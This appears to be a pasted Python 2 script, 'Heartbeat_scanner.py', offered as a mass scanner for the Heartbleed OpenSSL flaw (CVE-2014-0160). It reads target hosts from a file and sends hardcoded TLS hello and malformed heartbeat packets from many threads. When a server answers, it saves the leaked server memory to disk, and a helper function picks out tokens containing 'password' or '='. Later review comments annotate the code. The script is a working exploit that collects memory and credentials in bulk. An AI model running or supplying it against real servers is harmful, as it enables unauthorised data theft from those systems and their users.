
Heartbeat_scanner.py

theboogymaster Apr 9th, 2014 2,446 Never
  1. import socket, ssl, pprint
  2. import Queue
  3. import threading,time,sys,select,struct,urllib,time,re,os
  4.  
  5.  
  6. '''
  7.  
  8.    16 03 02 00 31 # TLS Header
  9.    01 00 00 2d # Handshake header
  10.    03 02 # ClientHello field: version number (TLS 1.1)
  11.    50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \
  12.    33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
  13.    00 # ClientHello field: session id
  14.    00 04 # ClientHello field: cipher suite length
  15.    00 33 c0 11 # ClientHello field: cipher suite(s)
  16.    01 # ClientHello field: compression support, length
  17.    00 # ClientHello field: compression support, no compression (0)
  18.    00 00 # ClientHello field: extension length (0)
  19.  
  20. '''
  21.  
  22.  
  23.  
  24. hello_packet = "16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex')
  25. hb_packet = "1803020003014000".decode('hex')
  26.  
  def password_parse(the_response):
      """Print each space-separated token that contains "=" or "password".

      Nothing in this listing calls the function. Matching tokens go to
      stdout exactly as they appear in ``the_response``, unredacted, so any
      console log of a run will hold whatever values matched.

      Args:
          the_response: text to split on single spaces.
      """
      markers = ("=", "password")
      for token in the_response.split(' '):
          if any(marker in token for marker in markers):
              print(token)
  33.  
  34.  
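  def recv_timeout(the_socket, timeout=2):
      """Read from ``the_socket`` until it goes quiet and return what arrived.

      The socket is switched to non-blocking mode and is left that way.
      Reading stops when the peer closes the connection, when data has
      arrived and ``timeout`` seconds pass with nothing new, or when nothing
      has arrived at all for ``timeout * 2`` seconds.

      Args:
          the_socket: a connected socket object.
          timeout: idle time in seconds that ends the read.

      Returns:
          Everything received, joined into one byte string (empty if nothing
          arrived).
      """
      the_socket.setblocking(0)

      chunks = []
      last_activity = time.time()
      while True:
          idle = time.time() - last_activity
          limit = timeout if chunks else timeout * 2
          if idle > limit:
              break

          try:
              # Wait in select() for the rest of the window. The earlier loop
              # called recv() on a non-blocking socket and swallowed the
              # resulting error, which spun a CPU core for the whole timeout.
              readable = select.select([the_socket], [], [], limit - idle)[0]
              if not readable:
                  continue
              data = the_socket.recv(8192)
          except (socket.error, select.error, ValueError):
              # Only socket-level failures are retried until the deadline; a
              # bare except here also hid KeyboardInterrupt and SystemExit.
              time.sleep(0.1)
              continue

          if not data:
              # Empty read means the peer closed; nothing more can arrive.
              break
          chunks.append(data)
          # Restart the idle window from the latest data.
          last_activity = time.time()

      return b''.join(chunks)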
  65.  
  66.  
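  def tls(target_addr):
      """Probe one ``host`` or ``host:port`` entry for CVE-2014-0160 and print the verdict.

      Connects over TCP (port 443 unless the entry names one), sends
      ``hello_packet``, discards the reply, sends ``hb_packet`` and reads the
      answer. A reply longer than 7 bytes is reported as vulnerable and the
      raw bytes are appended to ``<host>.txt`` in the working directory.

      NOTE(review): the verdict is a length check only. The reply is never
      parsed as a TLS record, so any late data longer than 7 bytes also reads
      as "vulnerable"; treat a positive as provisional until confirmed.

      Args:
          target_addr: target string; surrounding whitespace is stripped.

      Returns:
          None. Failures are printed with the target and port, not raised.
      """
      server_port = 443
      client_socket = None
      try:
          target_addr = target_addr.strip()

          if ":" in target_addr:
              fields = target_addr.split(":")
              server_port = fields[1]
              target_addr = fields[0]

          client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          sys.stdout.flush()
          sys.stderr.write('\n[+]Scanning  server %s \n\n' % target_addr)
          print("##############################################################")
          sys.stdout.flush()
          client_socket.connect((target_addr, int(server_port)))
          # Hello first; its reply is read only to drain the socket.
          client_socket.send(hello_packet)
          recv_timeout(client_socket, 3)
          print('Sending heartbeat request...')
          client_socket.send(hb_packet)
          data = recv_timeout(client_socket, 3)
          if len(data) > 7:
              print("[-]  %s  Vulnerable Server ...\n" % target_addr)
              # The reply is raw server memory and may hold credentials or key
              # material, so a new dump file is created owner-only (0600).
              # Append-or-create matches the earlier exists()/open() branches,
              # and binary mode keeps the bytes intact on every platform.
              # The file name is built from the target string as given; an
              # entry containing path separators would land outside the cwd.
              dump_flags = (os.O_WRONLY | os.O_APPEND | os.O_CREAT
                            | getattr(os, "O_BINARY", 0))
              dump_fd = os.open(target_addr + ".txt", dump_flags, 0o600)
              with os.fdopen(dump_fd, "ab") as file_write:
                  file_write.write(data)
          else:
              print("[-]  %s  Not Vulnerable  ..." % target_addr)
      except Exception as e:
          print("%s %s %s" % (e, target_addr, server_port))
      finally:
          # The socket was never closed before; release it on every path.
          if client_socket is not None:
              client_socket.close()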
  102.  
  103.  
  104.  
  class BinaryGrab(threading.Thread):
      """Worker thread that takes targets off a shared queue and probes each one."""

      def __init__(self, queue):
          """Remember the queue this worker will consume from."""
          super(BinaryGrab, self).__init__()
          self.queue = queue

      def run(self):
          """Loop forever: take one target, hand it to tls(), mark it done.

          The loop has no exit condition; the thread ends only when the
          process does.
          """
          while True:
              target = self.queue.get()
              tls(target)
              # Lets queue.join() in the caller see this item as finished.
              self.queue.task_done()
  119.  
  120.  
  121.  
  # Timestamp taken when the module is loaded; nothing in this listing reads it.
  start = time.time()
  123.  
  def manyurls(server_addr):
      """Probe every entry of ``server_addr`` and return once all are done.

      Starts one daemon ``BinaryGrab`` worker per entry, feeds the entries
      into a shared queue and blocks until each has been marked done.

      NOTE(review): the worker count equals the list length, so a long target
      list creates as many threads and simultaneous connections.

      Args:
          server_addr: list of target strings, passed unchanged to the workers.
      """
      queue = Queue.Queue()

      # One worker per entry, all sharing the same queue.
      for _ in server_addr:
          worker = BinaryGrab(queue)
          worker.setDaemon(True)
          worker.start()

      # Hand out the work.
      for target in server_addr:
          queue.put(target)

      # Block until every queued entry has been marked done.
      queue.join()
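  if __name__ == "__main__":
      # Targets are read from scan.txt in the working directory, one
      # host or host:port entry per line.
      print("[+] cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)")
      print("[+] Read More here http://www.garage4hackers.com/entry.php?b=2551")
      # Context manager so the list file is closed once read; the handle was
      # left open before.
      with open("scan.txt", "r") as read_f:
          server_addr = read_f.readlines()
      # A list of entries can be assigned to server_addr here instead.
      manyurls(server_addr)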